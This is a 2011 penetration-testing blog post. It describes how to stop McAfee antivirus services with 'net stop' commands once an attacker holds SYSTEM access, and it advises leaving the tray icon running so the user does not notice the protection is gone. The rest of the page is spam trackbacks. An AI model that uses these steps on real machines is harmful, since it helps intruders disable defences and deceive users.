Top
Search n00bz.net
  • South Florida Security Resources
    • HackMiami.org
      HackMiami is made up of information security professionals, hardware engineers, network administrators, students, and those who simply enjoy technology.
    • South Florida ISSA
      The Information Systems Security Association is, "the pre-eminent trusted global information security community".
  • PenTest Solutions
    • Rapid7 Metasploit Express
      Metasploit Express is an affordable, easy-to-use penetration testing solution that provides full network penetration testing capabilities, backed by the world’s largest, fully tested and integrated public database of exploits.
    • Core Impact PRO
      Core Impact is designed to evaluate the whole of the security in an office ecosystem. It allows the user to probe for and exploit security vulnerabilities in computer networks, endpoints and web applications.
« Metasploit Pro + Bypass Win UAC FTW! | Main | Happy Holiday's iPad owners »
Tuesday
Jan042011

Killing AV when it just will not Die!

DateTuesday, January 4, 2011 at 11:13AM

So we get a shell/meterpreter session and we escalate to system.  As NT AUTHORITY\SYSTEM we should be able to remove those pesky AV/HIPS products that prevent us from completing our penetration test.

Metasploit has an awesome script called killav which will defeat many AV products.  Sometimes however, AV just will not die.

Looking at the processes running we see all the processes running.  Once again, I am picking on McAfee but Symantec and friends has the same type of setup. 

Killing the pid also doesn't work since the application is running as a service.

However.......  If one were to run the following:

net stop “McAfee Framework Service"

net stop "McAfee McShield"

net stop "McAfee Engine Service"

Running the process list again shows McShield and his band of brothers are McGone!

It should be noted that we leave McTray.exe allowed to run so that the user will still see the shield running in the task bar and will not be aware that we have disabled the protection of AV entirely. 

The attacker is now able to infect the machine with any payload they see fit.  Go Zeus?

Authorn00bz Network | CommentPost a Comment | Reference6 References |
tagged , in ,

References (6)

References allow you to track sources for this article, as well as articles that were written in response to this article.
  • Response
    Response: www.theplanspecialist.co.za
    at www.theplanspecialist.co.za on July 27, 2013
    Losing weight Are, on a tainted?She jumps to, through it (they.Fire was worshipped, determined the divot.The temperature of bbw date, tell Google is fine print Every.Do You Dispute, relative Not only.,
  • Response
    Response: Brian Urlacher Jersey
    at Brian Urlacher Jersey on November 4, 2013
    NFL is actually one of the greatest sports in America. It has a important following.
  • Response
    Response: have a peek at these guys
    at have a peek at these guys on November 5, 2013
    Fantastic Site, Stick to the good work. With thanks!
  • Response
    Response: raspberry ketone diet
    at raspberry ketone diet on July 12, 2014
    Killing AV when it just will not Die! - Blog - n00bz Network
  • Response
    Response: korte kapsels
    at korte kapsels on July 24, 2014
    Killing AV when it just will not Die! - Blog - n00bz Network
  • Response
    Response: fat cells
    at fat cells on July 30, 2014
    Killing AV when it just will not Die! - Blog - n00bz Network

Reader Comments

There are no comments for this journal entry. To create a new comment, use the form below.

PostPost a New Comment

Enter your information below to add a new comment.

My response is on my own website »
Author Email (optional):
Author URL (optional):
Post:
 
Some HTML allowed: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>

Notify me of follow-up comments via email.